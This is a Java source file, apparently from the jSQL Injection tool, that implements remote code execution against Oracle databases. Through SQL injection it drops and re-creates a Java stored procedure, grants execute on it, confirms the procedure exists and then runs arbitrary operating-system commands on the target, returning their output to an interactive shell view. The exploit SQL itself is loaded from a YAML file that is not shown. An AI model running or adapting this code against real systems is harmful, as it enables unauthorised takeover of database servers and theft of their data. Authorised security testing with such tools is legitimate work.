1 package com.jsql.model.accessible.vendor;
2
3 import com.jsql.model.InjectionModel;
4 import com.jsql.model.accessible.ExploitMode;
5 import com.jsql.model.accessible.ResourceAccess;
6 import com.jsql.model.accessible.vendor.oracle.ModelYamlOracle;
7 import com.jsql.model.bean.util.Interaction;
8 import com.jsql.model.bean.util.Request;
9 import com.jsql.model.exception.JSqlException;
10 import com.jsql.model.injection.vendor.model.VendorYaml;
11 import com.jsql.util.LogLevelUtil;
12 import org.apache.commons.lang3.StringUtils;
13 import org.apache.logging.log4j.LogManager;
14 import org.apache.logging.log4j.Logger;
15 import org.yaml.snakeyaml.Yaml;
16
17 import java.util.Arrays;
18 import java.util.UUID;
19
20 public class ExploitOracle {
21
22
23
24
25 private static final Logger LOGGER = LogManager.getRootLogger();
26 private final InjectionModel injectionModel;
27 private final ModelYamlOracle modelYaml;
28
29 private static final String RCE_JAVA_UTIL_SRC = "RCE_JAVA_UTIL_SRC";
30 private static final String RCE_JAVA_UTIL_FUNC = "RCE_JAVA_UTIL_FUNC";
31
32 public ExploitOracle(InjectionModel injectionModel) {
33 this.injectionModel = injectionModel;
34 var yaml = new Yaml();
35 this.modelYaml = yaml.loadAs(
36 injectionModel.getMediatorVendor().getOracle().instance().getModelYaml().getResource().getExploit(),
37 ModelYamlOracle.class
38 );
39 }
40
41 public void createRce(ExploitMode exploitMode) throws JSqlException {
42 if (!Arrays.asList(ExploitMode.AUTO, ExploitMode.QUERY_BODY).contains(exploitMode)) {
43 LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead");
44 }
45
46 this.injectionModel.injectWithoutIndex(String.format(
47 this.modelYaml.getUdf().getDropSource(),
48 ExploitOracle.RCE_JAVA_UTIL_SRC
49 ), "body#drop-src");
50 this.injectionModel.injectWithoutIndex(String.format(
51 this.modelYaml.getUdf().getDropFunc(),
52 ExploitOracle.RCE_JAVA_UTIL_FUNC
53 ), "body#drop-src");
54 this.injectionModel.injectWithoutIndex(String.format(
55 this.modelYaml.getUdf().getAddSource(),
56 ExploitOracle.RCE_JAVA_UTIL_SRC,
57 ExploitOracle.RCE_JAVA_UTIL_SRC
58 ), "body#add-src");
59 this.injectionModel.injectWithoutIndex(String.format(
60 this.modelYaml.getUdf().getAddFunc(),
61 ExploitOracle.RCE_JAVA_UTIL_FUNC,
62 ExploitOracle.RCE_JAVA_UTIL_SRC
63 ), ResourceAccess.ADD_FUNC);
64 this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getGrant(), "body#grant-exec");
65 var nameDatabase = this.injectionModel.getResourceAccess().getResult(String.format(
66 this.modelYaml.getUdf().getConfirm(),
67 VendorYaml.TRAIL_SQL,
68 ExploitOracle.RCE_JAVA_UTIL_FUNC
69 ), ResourceAccess.BODY_CONFIRM);
70 if (!nameDatabase.contains(ExploitOracle.RCE_JAVA_UTIL_FUNC)) {
71 LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: java function not found");
72 return;
73 }
74 LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found");
75
76 var request = new Request();
77 request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_ORACLE);
78 request.setParameters(null, null);
79 this.injectionModel.sendToViews(request);
80 }
81
82 public String runRceCmd(String command, UUID uuidShell) {
83 String result;
84 try {
85 result = this.injectionModel.getResourceAccess().getResult(String.format(
86 this.modelYaml.getUdf().getRunCmd(),
87 ExploitOracle.RCE_JAVA_UTIL_FUNC,
88 command.replace(StringUtils.SPACE, "%20"),
89 VendorYaml.TRAIL_SQL
90 ), ResourceAccess.UDF_RUN_CMD);
91 } catch (JSqlException e) {
92 result = String.format(ResourceAccess.TEMPLATE_ERROR, e.getMessage(), command);
93 }
94 var request = new Request();
95 request.setMessage(Interaction.GET_EXPLOIT_RCE_RESULT);
96 request.setParameters(uuidShell, result);
97 this.injectionModel.sendToViews(request);
98 return result;
99 }
100 }